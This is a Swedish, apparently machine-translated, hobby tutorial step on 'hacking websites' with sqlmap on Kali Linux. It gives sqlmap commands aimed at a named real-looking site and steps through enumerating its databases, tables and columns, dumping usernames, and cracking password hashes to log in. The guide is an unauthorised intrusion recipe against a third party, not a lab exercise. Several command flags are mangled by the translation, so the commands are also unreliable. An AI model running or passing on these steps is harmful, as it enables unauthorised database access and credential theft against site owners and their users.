Dataintrång webbplatser med sqlmap och kali linux (4 / 4 steg)
Steg 4: Använda sqlmap för att hacka den
I din terminaltyp:
sqlmap -u http://www.angelvestgroup.com/info.php?id=1 --dbs
(http://www.angelvestgroup.com/info.php?id=1 är min sårbara url)
Nu är det kommer att ladda databaser...
Om detta sker måste du välja en databas genom att skriva:
sqlmap -u http://www.angelvestgroup.com/info.php?id=1 -D angelvest_china--tabeller
(angelvest_china är databasen jag hittade)
Det kommer nu att läsa all information som finns i den databas som du har valt.
Nu måste du välja en tabell genom att skriva:
sqlmap -u http://www.angelvestgroup.com/info.php?id=1 -D angelvest_china -T db_user--kolumn
(db_user är tabellen jag hittade)
Nu måste du markera en kolumn genom att skriva:
sqlmap -u http://www.angelvestgroup.com/info.php?id=1 -D angelvest_china -T db_user - C användarnamn--dump
(användarnamn är namnet på den kolumn som jag hittade)
Nu det kommer att dumpa informationen i kolumnen användarnamn och: du har hackat det! (På den här webbplatsen finns en kolumn som heter lösenord också så du behöver bara att dekryptera hashvärden i denna kolumn och boom! Du kan logga in.)
Grattis! Du har bara hackad en webbplats med sqlmap! Om du gillade den instructable bör du ta en titt på min andra instructables också! Håll ögonen öppna för mer!